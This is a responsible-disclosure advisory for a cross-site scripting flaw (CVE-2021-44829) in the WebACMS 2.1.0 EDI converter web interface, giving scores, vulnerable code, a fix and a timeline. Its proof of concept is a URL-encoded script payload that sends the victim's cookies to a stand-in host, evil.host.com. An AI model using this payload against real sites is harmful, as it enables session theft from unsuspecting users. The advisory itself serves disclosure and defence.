WebACMS 2.1.0 Cross Site Scripting

2022.01.26
Credit: Patrick Hener
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Advisory ID: TO-2021-001 Product: WebACMS Vendor: AFI Solutions GmbH Tested Version: 2.1.0 Fixed Version: - Vulnerability Type: Cross-Site Scripting (CWE-79) CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:P/A:N (Score 6.4) CVSSv3 Severity: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (Score 6.1) Solution Status: Unfixed Manufacturer Notification: 2021-12-13 Solution Date: 2022-01-17 Public Disclosure: 2022-01-20 CVE Reference: CVE-2021-44829 Authors of Advisory: Patrick Hener & Siva Rajendran, Thinking Objects GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The product "ACMS" of AFI Solutions GmbH [1] is a so called edi converter. For companies to be able to exchange arbitrary data it is common to use a edi converter to convert between data formats of the sender and the recipient. The product of AFI Solutions also incorporates a web interface, which is the subject of this advisory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The index page has a parameter "ID" which is used to navigate within the web application. It is not properly sanitized and will be rendered into the login form of the index page, as well. The vulnerable code will be shown from the following listing: <FORM name=thisForm METHOD=post action="/index.html?id=1" target="_top"> <table class="logintable"> <tr> <td width="110">Benutzername</td> [.. truncated ..] </form> The parameter can be chosen from the actual url in the browser and thus is unsanitized user controlled input. This makes the application vulnerable to reflected Cross-Site Scripting. This vulnerability also applies to basically all user controlled input after login. Also content returned by the database is not properly sanitized before presentation, as well. Therefore the app is also vulnerable to stored Cross-Site Scripting. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following request will steal the applications insecure cookies using this vulnerablity. GET /index.html?id=%22%3E%3Cscript%3Edocument.location=%27http://evil.host.com /cookies?%27%2Bdocument.cookie;%3C/script%3E%3Cid=%22 HTTP/1.1 Host: vulnerable.host.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif, image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: COMID= Upgrade-Insecure-Requests: 1 This will render to the following html code and trigger in a victims browser. <FORM name=thisForm METHOD=post action="/index.html?id="><script> document.location='http://evil.host.com/cookies?'+document.cookie;</script> <id="" target="_top"> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The user supplied data should be sanitized before using it to render a page. Also database retrieved content should be sanitized before presenting it to the browser again. The vendor states that this software component was only used by the vendors support and that it is not used actively anymore. The vendor recommends to deactivate this component. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-12-10: Vulnerability discovered 2021-12-13: Vulnerability reported to manufacturer 2022-01-17: Solution provided by manufacturer 2022-01-20: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Vendor Website https://www.afi-solutions.com/ [2] Thinking Objects Security Advisory https://blog.to.com/advisory-webacms-2-1-0-cross-site-scripting [3] Thinking Objects Responsible Disclosure Policy https://blog.to.com/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Patrick Hener and Siva Rajendran of Thinking Objects GmbH. E-Mail: patrick.hener@to.com Public Keys: https://to.com/pgp-keys Key ID: 877756EA2CB50685 Key Fingerprint: 2605 3D51 3FAA 3795 E116 95EC 8777 56EA 2CB5 0685 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top